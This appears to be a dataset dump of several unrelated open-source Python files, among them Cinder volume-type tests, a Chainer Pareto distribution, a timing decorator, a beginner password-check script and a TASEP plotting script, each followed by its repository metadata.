suite_list.append(TestLoader().loadTestsFromTestCase(TestProxy))
suite = TestSuite(suite_list)
TextTestRunner(verbosity=2).run(suite)
if __name__ == "__main__":
run_tests()
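# Hedged alternative: the same suite can usually be collected with test
# discovery instead of listing every case by hand; since these modules end
# in "Test.py" rather than the default "test_*.py" pattern, a pattern
# override would be needed:
#
#   python -m unittest discover -s UnitTests -p '*Test.py' -v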
|
Valentijn1995/Kn0ckKn0ck
|
Kn0ckKn0ckTestSuite.py
|
Python
|
mit
| 1,092 | 0.000916 |
# Copyright (c) 2011 Zadara Storage Inc.
# Copyright (c) 2011 OpenStack Foundation
# Copyright 2011 University of Southern California
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for volume types extra specs code
"""
from cinder import context
from cinder import db
from cinder import test
class VolumeTypeExtraSpecsTestCase(test.TestCase):
def setUp(self):
super(VolumeTypeExtraSpecsTestCase, self).setUp()
self.context = context.get_admin_context()
self.vol_type1 = dict(name="TEST: Regular volume test")
self.vol_type1_specs = dict(vol_extra1="value1",
vol_extra2="value2",
vol_extra3=3)
self.vol_type1['extra_specs'] = self.vol_type1_specs
ref = db.volume_type_create(self.context, self.vol_type1)
self.addCleanup(db.volume_type_destroy, context.get_admin_context(),
self.vol_type1['id'])
self.volume_type1_id = ref.id
for k, v in self.vol_type1_specs.items():
self.vol_type1_specs[k] = str(v)
self.vol_type2_noextra = dict(name="TEST: Volume type without extra")
ref = db.volume_type_create(self.context, self.vol_type2_noextra)
self.addCleanup(db.volume_type_destroy, context.get_admin_context(),
self.vol_type2_noextra['id'])
self.vol_type2_id = ref.id
def test_volume_type_specs_get(self):
expected_specs = self.vol_type1_specs.copy()
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_delete(self):
expected_specs = self.vol_type1_specs.copy()
del expected_specs['vol_extra2']
db.volume_type_extra_specs_delete(context.get_admin_context(),
self.volume_type1_id,
'vol_extra2')
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_update(self):
expected_specs = self.vol_type1_specs.copy()
expected_specs['vol_extra3'] = "4"
db.volume_type_extra_specs_update_or_create(
context.get_admin_context(),
self.volume_type1_id,
dict(vol_extra3=4))
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_create(self):
expected_specs = self.vol_type1_specs.copy()
expected_specs['vol_extra4'] = 'value4'
expected_specs['vol_extra5'] = 'value5'
db.volume_type_extra_specs_update_or_create(
context.get_admin_context(),
self.volume_type1_id,
dict(vol_extra4="value4",
vol_extra5="value5"))
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_get_with_extra_specs(self):
volume_type = db.volume_type_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs)
volume_type = db.volume_type_get(
context.get_admin_context(),
self.vol_type2_id)
self.assertEqual(volume_type['extra_specs'], {})
def test_volume_type_get_by_name_with_extra_specs(self):
volume_type = db.volume_type_get_by_name(
context.get_admin_context(),
self.vol_type1['name'])
self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs)
volume_type = db.volume_type_get_by_name(
context.get_admin_context(),
self.vol_type2_noextra['name'])
self.assertEqual(volume_type['extra_specs'], {})
def test_volume_type_get_all(self):
expected_specs = self.vol_type1_specs.copy()
types = db.volume_type_get_all(context.get_admin_context())
self.assertEqual(
types[self.vol_type1['name']]['extra_specs'], expected_specs)
self.assertEqual(
types[self.vol_type2_noextra['name']]['extra_specs'], {})
|
rakeshmi/cinder
|
cinder/tests/unit/test_volume_types_extra_specs.py
|
Python
|
apache-2.0
| 5,074 | 0 |
import chainer
from chainer.backends import cuda
from chainer import distribution
from chainer.functions.array import where
from chainer.functions.math import exponential
from chainer import utils
class Pareto(distribution.Distribution):
"""Pareto Distribution.
.. math::
f(x) = \\alpha x_m^{\\alpha} x^{-(\\alpha+1)},
Args:
scale(:class:`~chainer.Variable` or :ref:`ndarray`): Parameter of
distribution :math:`x_m`.
alpha(:class:`~chainer.Variable` or :ref:`ndarray`): Parameter of
distribution :math:`\\alpha`.
"""
def __init__(self, scale, alpha):
super(Pareto, self).__init__()
self.__scale = chainer.as_variable(scale)
self.__alpha = chainer.as_variable(alpha)
@property
def scale(self):
return self.__scale
@property
def alpha(self):
return self.__alpha
@property
def batch_shape(self):
return self.scale.shape
@property
def entropy(self):
return - exponential.log(self.alpha) + exponential.log(self.scale) \
+ 1. / self.alpha + 1.
@property
def event_shape(self):
return ()
@property
def _is_gpu(self):
return isinstance(self.scale.data, cuda.ndarray)
def log_prob(self, x):
x = chainer.as_variable(x)
logp = exponential.log(self.alpha) \
+ self.alpha * exponential.log(self.scale) \
- (self.alpha + 1) * exponential.log(x)
xp = logp.xp
return where.where(
utils.force_array(x.data >= self.scale.data),
logp, xp.array(-xp.inf, logp.dtype))
@property
def mean(self):
mean = (self.alpha * self.scale / (self.alpha - 1))
xp = mean.xp
return where.where(
self.alpha.data > 1,
mean, xp.array(xp.inf, mean.dtype))
def sample_n(self, n):
xp = cuda.get_array_module(self.scale)
if xp is cuda.cupy:
eps = xp.random.pareto(
self.alpha.data, (n,)+self.batch_shape, dtype=self.alpha.dtype)
else:
eps = xp.random.pareto(
self.alpha.data, (n,)+self.batch_shape
).astype(self.alpha.dtype)
noise = self.scale * (eps + 1)
return noise
@property
def support(self):
return '[scale, inf]'
@property
def variance(self):
var = self.scale ** 2 * self.alpha / (self.alpha - 1) ** 2 \
/ (self.alpha - 2)
xp = var.xp
return where.where(
self.alpha.data > 2,
var, xp.array(xp.inf, var.dtype))
@distribution.register_kl(Pareto, Pareto)
def _kl_pareto_pareto(dist1, dist2):
kl = dist2.alpha * (exponential.log(dist1.scale)
- exponential.log(dist2.scale)) \
+ exponential.log(dist1.alpha) - exponential.log(dist2.alpha) \
+ (dist2.alpha - dist1.alpha) / dist1.alpha
xp = kl.xp
return where.where(
dist1.scale.data >= dist2.scale.data,
kl, xp.array(xp.inf, kl.dtype))
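# Hedged usage sketch (illustrative values):
#
#   import numpy as np
#   dist = Pareto(scale=np.array(1., np.float32), alpha=np.array(3., np.float32))
#   samples = dist.sample_n(5)  # shape (5,), scale * (pareto noise + 1)
#   dist.log_prob(samples)      # finite, since every sample is >= scale
#   dist.mean                   # alpha * scale / (alpha - 1) = 1.5 here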
|
ktnyt/chainer
|
chainer/distributions/pareto.py
|
Python
|
mit
| 3,069 | 0 |
print('What is the password?')
password = input()
if password == 'rosebud':
    print('Access granted.')
else:
    print('Access denied.')
print('Done.')
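# A hedged variant: for real use, the standard library's getpass keeps the
# password from echoing to the terminal:
#
#   from getpass import getpass
#   password = getpass('What is the password? ')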
|
SafeW3rd/Ciphers
|
password.py
|
Python
|
mit
| 179 | 0.005587 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Ricardo Ribeiro"
__credits__ = ["Ricardo Ribeiro"]
__license__ = "MIT"
__version__ = "0.0"
__maintainer__ = "Ricardo Ribeiro"
__email__ = "ricardojvr@gmail.com"
__status__ = "Development"
import time
from datetime import datetime, timedelta
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time()
time_elapsed = datetime(1, 1, 1) + timedelta(seconds=(te - ts))
print("%s: %d:%d:%d:%d;%d" % (method.__name__, time_elapsed.day-1, time_elapsed.hour, time_elapsed.minute, time_elapsed.second, time_elapsed.microsecond))
return result
return timed
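# Hedged usage sketch: decorating a function prints its wall-clock time in
# the "day:hour:minute:second;microsecond" format built above:
#
#   @timeit
#   def slow_add(a, b):
#       time.sleep(0.25)
#       return a + b
#
#   slow_add(1, 2)  # prints e.g. "slow_add: 0:0:0:0;250123" and returns 3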
|
sunj1/my_pyforms
|
pyforms/Utils/timeit.py
|
Python
|
mit
| 694 | 0.034582 |
import matplotlib.pyplot as plt
import numpy as np
from glob import glob
from scipy import stats
#p = 0.5
e = 0.1
qth = [25,50,75,90]
nomefile = './N*' + '_B*' + '_p=1su2L_e0.0.npy'
nomefile = glob(nomefile)
data = []
N = []
medie = []
mediane = []
massimi = []
perc = []
nomefile.sort(key=lambda x:int(x.split('_')[1][1:]))
'''
this sort is essential; Carlo, you had forgotten the int() and it
did not work!
'''
for f in nomefile:
N.append(2*int(f.split('_')[1][1:]))
data.append(np.load(f))
medie.append(np.mean(data[-1]))
massimi.append(max(data[-1]))
mediane.append(np.median(data[-1]))
perc.append(np.percentile(data[-1], qth))
perc = np.array(perc)
perc= perc.T
xi = np.array(N) - 10
Eslope, Eintercept, Er_value, Ep_value, Estd_err = stats.linregress(xi, medie)
Mslope, Mintercept, Mr_value, Mp_value, Mstd_err = stats.linregress(xi, massimi)
MEDslope, MEDintercept, MEDr_value, MEDp_value, Mstd_err = stats.linregress(xi, mediane)
fig, (ax, bx, cx) = plt.subplots(ncols=3)
fig.suptitle('Coalescence Times for Parallel TASEP p=1/2L e=0.0', fontsize=18)
Eline = Eslope*xi + Eintercept
MEDline = MEDslope*xi + MEDintercept
Mline = Mslope*xi + Mintercept
ax.plot(N,Eline,'r-',N,medie,'o')
ax.set_ylabel('Mean of Coalescence Times', fontsize=15)
ax.set_xlabel('Number of Sites of the Ring')
ax.text(15,35, 'Slope = %f \nIntercept = %f' %(Eslope, Eintercept), fontsize=16)
bx.plot(N,MEDline,'r-',N,mediane,'x')
bx.set_ylabel('Median of Coalescence Times', fontsize=15)
bx.set_xlabel('Number of Sites of the Ring')
bx.text(15, 15, 'Slope = %f \nIntercept = %f' %(MEDslope, MEDintercept), fontsize=16)
cx.plot(N,Mline,'r-',N,massimi,'g^')
cx.text(15, 1000, 'Slope = %f \nIntercept = %f' %(Mslope, Mintercept), fontsize=16)
cx.set_ylabel('Max of Coalescence Times', fontsize=15)
cx.set_xlabel('Number of Sites of the Ring')
plt.show()
fig = plt.figure()
# for row, lab in zip(perc[::-1], qth[::-1]):
#     plt.plot(N, row, label=lab)
# '''
# I used the extended slice syntax only to get the legend in descending order
# '''
# plt.legend(loc=2, title='Percentiles')
# plt.ylabel('Values of Percentiles of Coalescence Times')
# plt.xlabel('Number of Sites of the Ring')
# plt.title('Percentiles of Coalescence Times of Parallel TASEP p0.5 e0.1')
# plt.show(fig)
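# Hedged note: on a headless machine the figures can be written to disk
# instead of shown interactively, e.g.:
#
#   fig.savefig('percentiles.png', dpi=150, bbox_inches='tight')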
|
clancia/TASEP
|
Sequential_TASEP/LinRegCTvsSize.py
|
Python
|
gpl-2.0
| 2,328 | 0.018041 |